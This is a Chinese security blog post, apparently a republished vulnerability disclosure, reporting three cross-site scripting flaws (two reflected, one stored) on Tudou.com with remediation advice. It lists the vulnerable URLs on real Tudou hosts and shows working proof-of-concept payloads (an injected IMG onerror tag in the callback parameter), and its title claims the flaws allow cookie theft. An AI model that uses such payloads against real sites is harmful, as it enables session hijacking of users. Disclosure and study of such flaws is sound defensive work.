记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

土豆网三枚XSS(均可获取cookie)

2013-10-19 15:00
土豆网某些页面由于没有进行过滤或过滤不严导致存在的两枚反射型和一枚存储型XSS跨站漏洞

存在反射型XSS的两个地址
 
1、
http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun2、
http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun
 
存在存储型XSS的一个地址(这个我看已经有人发布了,但目前为止仍未修复)
 
3、
http://marketing.tudou.com/tianlei/shumenol2/upload.php
 
 
http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun%3CIMG%20SRC=1%20onerror=alert%28/XSS/%29%3E
 
http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun%3CIMG%20SRC=1%20onerror=alert%28/XSS/%29%3E
 
http://marketing.tudou.com/tianlei/shumenol2/upload.php
没有对用户输入进行数据合法性验证,导致了持久性XSS
http://marketing.tudou.com/tianlei/shumenol2/view.php?id=1845349
//firefox弹窗效果
 


//chrome弹窗效果 
 
修复方案:

1、过滤不可信数据
 
2、对用户输入进行数据合法性验证
 
3、为Cookie加上HttpOnly 
 
知识来源: www.2cto.com/Article/201310/251132.html

阅读:78315 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“土豆网三枚XSS(均可获取cookie)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云